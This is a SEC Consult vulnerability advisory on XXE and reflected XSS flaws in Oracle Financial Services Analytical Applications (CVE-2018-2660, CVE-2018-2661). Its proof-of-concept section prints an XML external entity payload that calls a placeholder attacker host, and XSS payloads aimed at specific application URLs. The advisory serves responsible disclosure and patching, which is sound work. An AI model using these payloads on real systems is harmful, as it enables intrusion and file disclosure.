XXE & Reflected XSS in Oracle Financial Services Analytical Applications

Project Description

The Oracle Financial Services Analytical Application is affected by an XML External Entity (XXE) vulnerability which may lead to disclosing sensitive information. It is also affected by a reflected cross site scripting (XSS) issue.


Vendor description

“Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need.”

Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html

Business recommendation

By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user’s system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code.

SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues.

Vulnerability overview/description

1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)

The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application.

2) Reflected Cross Site Scripting (CVE-2018-2661)

This vulnerability allows an unauthenticated user to inject malicious client side script which will be executed in the browser of a user if he visits the manipulated URL.

Proof of concept

1) XML External Entity Injection (XXE) (CVE-2018-2660)

For example, by importing the following XML code in the “Business Model Upload” function a connection request from the server to the attacker’s system will be made.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

2) Reflected Cross Site Scripting (CVE-2018-2661)

The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters.

The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm

Vulnerable / tested versions

The following version has been tested which was the most recent one when the vulnerabilities were discovered:

  • Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018.

Vendor contact timeline

2017-09-11: Contacting vendor through encrypted email (secalert_us@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that Critical Patch Update that includes fixes of reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory

Solution

Apply patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Workaround

None

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF M. Shah / @2018

Project Details

  • TitleXXE & Reflected XSS
  • ProductOracle Financial Services Analytical Applications
  • Vulnerable version7.3.5.x, 8.0.x
  • Fixed versionOracle CPU January 2018
  • CVE numberCVE-2018-2660, CVE-2018-2661
  • ImpactHigh
  • Homepagehttp://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
  • Found2017-06-15
  • ByMohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Privacy Statement. Legal Notice

Back